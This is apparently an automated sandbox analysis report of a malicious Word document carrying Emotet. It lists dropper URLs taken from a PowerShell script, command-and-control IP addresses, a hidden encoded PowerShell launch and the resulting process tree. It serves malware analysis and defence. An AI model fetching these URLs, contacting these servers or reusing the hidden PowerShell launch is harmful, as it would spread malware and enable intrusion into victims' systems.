Analysis

  • max time kernel: 136s
  • resource: win7v191014
  • submitted: 11-12-2019 04:53

General

  • Target: Docs_6ad036ba93c94d6976e2d93c7a3aec6f.html.doc
  • Sample: 191211-f8fmpds2me
  • SHA256: 4ee0bf78e3b0a06c35fed0f912db6fabbb5fae13f838cd4132634359ad0d24da

Malware Config

Extracted

  • Language: ps1
  • Source
  • URLs (type: exe.dropper)
    • http://www.prorites.com/wp-content/dsdb28de-kw0ch1msvi-003/
    • https://www.silvesterinmailand.com/wp-content/uploads/ibvgux-yg4-03475/
    • http://homemyland.net/tmp/wUHdeBS/
    • https://www.celbra.com.br/old/wp-content/uploads/2019/mbwl6-lwu0psmcb-523/
    • http://prihlaska.sagitta.cz/wp-content/uploads/WwcQXtRta/

Extracted

  • Family: emotet
  • C2
    • 200.41.121.69:443
    • 153.190.41.185:80
    • 165.100.148.200:443
    • 103.9.145.19:8080
    • 46.105.128.215:8080
    • 172.105.213.30:80
    • 69.30.205.162:7080
    • 172.104.70.207:8080
    • 198.57.217.170:8080
    • 103.122.75.218:80
    • 212.112.113.235:80
    • 113.52.135.33:7080
    • 60.53.3.153:8080
    • 1.32.54.12:8080
    • 142.93.87.198:8080
    • 91.117.31.181:80
    • 45.129.121.222:443
    • 186.215.101.106:80
    • 143.95.101.72:8080
    • 187.233.220.93:443
  • rsa_pubkey.plain

Signatures

  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Executes dropped EXE 4 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • Emotet

    Emotet is a trojan that is primarily spread through spam emails.

  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of WriteProcessMemory 3 IoCs
  • Suspicious behavior: EmotetMutantsSpam 2 IoCs
  • Drops file in System32 directory 6 IoCs
  • Modifies registry class 136 IoCs
  • Modifies system certificate store 2 TTPs 1 IoCs
  • Suspicious use of SetWindowsHookEx 6 IoCs

Processes

  • C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\Docs_6ad036ba93c94d6976e2d93c7a3aec6f.html.doc"
    1⤵
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of FindShellTrayWindow
    • Drops file in System32 directory
    • Suspicious use of SetWindowsHookEx
    PID:1424
  • C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exe
    Powershell -w hidden -en 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
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of WriteProcessMemory
    • Drops file in System32 directory
    PID:1984
    • C:\Users\Admin\216.exe
      "C:\Users\Admin\216.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious use of WriteProcessMemory
      • Suspicious use of SetWindowsHookEx
      PID:1404
      • C:\Users\Admin\216.exe
        --7272c7d5
        3⤵
        • Executes dropped EXE
        • Suspicious behavior: EmotetMutantsSpam
        • Drops file in System32 directory
        • Suspicious use of SetWindowsHookEx
        PID:2016
  • C:\Windows\system32\conhost.exe
    \??\C:\Windows\system32\conhost.exe "-388722206-19565585701416385159-1724534010-776757088-167748554900424385-104918526"
    1⤵
    • Suspicious use of SetWindowsHookEx
    PID:1980
  • C:\Windows\System32\svchost.exe
    C:\Windows\System32\svchost.exe -k WerSvcGroup
    1⤵
    PID:1516
  • C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE
    "C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE"
    1⤵
    PID:1332
  • C:\Windows\SysWOW64\rdstextto.exe
    "C:\Windows\SysWOW64\rdstextto.exe"
    1⤵
    • Executes dropped EXE
    • Suspicious use of WriteProcessMemory
    • Suspicious use of SetWindowsHookEx
    PID:1956
    • C:\Windows\SysWOW64\rdstextto.exe
      --95f2d49f
      2⤵
      • Executes dropped EXE
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: EmotetMutantsSpam
      • Drops file in System32 directory
      • Suspicious use of SetWindowsHookEx
      PID:1960

Network

MITRE ATT&CK Matrix ATT&CK v6

  • Defense Evasion
    • Install Root Certificate (T1130): 1
    • Modify Registry (T1112): 1
  • Discovery
    • Query Registry (T1012): 1


Downloads

  • C:\Users\Admin\216.exe
  • C:\Users\Admin\216.exe
  • C:\Users\Admin\216.exe
  • C:\Windows\SysWOW64\rdstextto.exe
  • C:\Windows\SysWOW64\rdstextto.exe
  • memory/1404-9-0x00000000003E0000-0x00000000003F7000-memory.dmp (Filesize: 92KB)
  • memory/1424-5-0x00000000061B0000-0x00000000063B0000-memory.dmp (Filesize: 2.0MB)
  • memory/1424-0-0x00000000061B0000-0x00000000061B4000-memory.dmp (Filesize: 16KB)
  • memory/1424-4-0x00000000061B0000-0x00000000063B0000-memory.dmp (Filesize: 2.0MB)
  • memory/1424-3-0x0000000008F20000-0x0000000008F24000-memory.dmp (Filesize: 16KB)
  • memory/1956-14-0x0000000000600000-0x0000000000617000-memory.dmp (Filesize: 92KB)
  • memory/1960-16-0x0000000000300000-0x0000000000317000-memory.dmp (Filesize: 92KB)
  • memory/1960-17-0x0000000000400000-0x0000000000492000-memory.dmp (Filesize: 584KB)
  • memory/2016-11-0x0000000000280000-0x0000000000297000-memory.dmp (Filesize: 92KB)
  • memory/2016-12-0x0000000000400000-0x0000000000492000-memory.dmp (Filesize: 584KB)